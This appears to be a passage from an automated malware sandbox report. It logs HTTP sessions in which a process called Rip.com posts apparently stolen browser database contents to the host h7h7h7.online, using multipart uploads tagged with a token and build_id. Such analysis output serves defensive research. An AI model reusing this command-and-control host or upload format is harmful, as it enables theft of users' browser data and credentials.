                                                                                                                                                                                                                                                                      Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:43 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      17192.168.2.449818116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:43 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----xt00zm7q16pzmy5xlng4
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 493
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:43 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 78 74 30 30 7a 6d 37 71 31 36 70 7a 6d 79 35 78 6c 6e 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 78 74 30 30 7a 6d 37 71 31 36 70 7a 6d 79 35 78 6c 6e 67 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 78 74 30 30 7a 6d 37 71 31 36 70 7a 6d 79 35 78 6c 6e 67 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------xt00zm7q16pzmy5xlng4Content-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------xt00zm7q16pzmy5xlng4Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------xt00zm7q16pzmy5xlng4Cont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:44 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      18192.168.2.449819116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----iekxl6fct00rqi5fkny5
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 169765
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 69 65 6b 78 6c 36 66 63 74 30 30 72 71 69 35 66 6b 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 69 65 6b 78 6c 36 66 63 74 30 30 72 71 69 35 66 6b 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 69 65 6b 78 6c 36 66 63 74 30 30 72 71 69 35 66 6b 6e 79 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------iekxl6fct00rqi5fkny5Content-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------iekxl6fct00rqi5fkny5Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------iekxl6fct00rqi5fkny5Cont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:45 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                                      Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                                      2024-12-31 20:33:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:46 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      19192.168.2.449820116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:46 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----uaa1dt26xt2nyus2nopz
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 66001
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
